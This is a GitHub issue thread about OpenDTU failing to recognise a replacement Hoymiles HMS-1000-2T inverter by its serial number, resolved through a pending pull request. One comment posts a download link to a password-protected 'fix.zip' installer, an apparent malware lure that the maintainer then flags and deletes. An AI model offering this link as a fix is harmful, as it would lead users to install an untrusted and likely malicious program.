### ISSUE TITLE
HMS-1000-2T not recognized following replacement by after-sales service

### ISSUE THREAD

**Issue by elloupgarou** [tbnobody/OpenDTU#2230]
### What happened?

Following a fault on my micro-inverter, hoymiles proceeded to replace it.
After receiving the new one, after having entered the serial number on the new one, it goes back to type Unknown on the interface.Following a fault on my micro-inverter, hoymiles proceeded to replace it.
After receiving the new one, after having entered the serial number on the new one, it goes back to type Unknown on the interface.

### To Reproduce Bug

S/N: 1410A01XXXXX

### Expected Behavior

I expect that when I enter the serial number of this micro-inverter it will be recognized as type HMS-600/700/800/900/1000-2T.

### Install Method

Self-Compiled

### What git-hash/version of OpenDTU?

v24.5.6 (openfusionv2)

### Please confirm the following

- [X] I believe this issue is a bug that affects all users of OpenDTU, not something specific to my installation.
- [X] I have already searched for relevant existing issues and discussions before opening this report.
- [X] I have updated the title field above with a concise description.
- [X] I have double checked that my inverter does not contain a W in the model name (like HMS-xxxW) as they are not supported

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by tbnobody** [comment]
Deleted the comment from WSA1k as it contains some kind of weird installer.

**Comment by kindyy** [comment]
I am getting the same error even though I have checked the series 40 times. With the latest firmware version (OpenDTU v24.8.5).
Model: HMS-1000-2T

![inverter](https://github.com/user-attachments/assets/d8f27921-d20b-49da-9cd1-194214d6a335)

**Comment by stefan123t** [comment]
@elloupgarou & @kindyy is this a HMS or an HMS-WiFi model with a builtin DTUBI ? The newer DTUBI HMS-WiFi models do have two distinct serial numbers on the stickers.

Other than that the model prefix would need to be added to the existing and matching HMS model class. Just follow the general concept described by tbnobody here for the HERF-300 and the HM-300 model class: https://github.com/tbnobody/OpenDTU/issues/2236#issuecomment-2318189313

**Comment by kindyy** [comment]
If you follow the link just above the comment https://github.com/tbnobody/OpenDTU/pull/2235, you'll find all the information and screenshots.

The fix is already applied on my setup, and it's working. It should be included in the next release. This concerns non-WiFi microinverters.

**Comment by stefan123t** [comment]
@kindyy much appreciated it will be in the next release. So @elloupgarou may try this too.

**Comment by elloupgarou** [comment]
Hello,

I'm back from vacation.
Thanks kindyy for the information.
I made a request for the modifications you tested and validated to be compiled into a generic_esp32s3_usb binary so that I can test on my side.
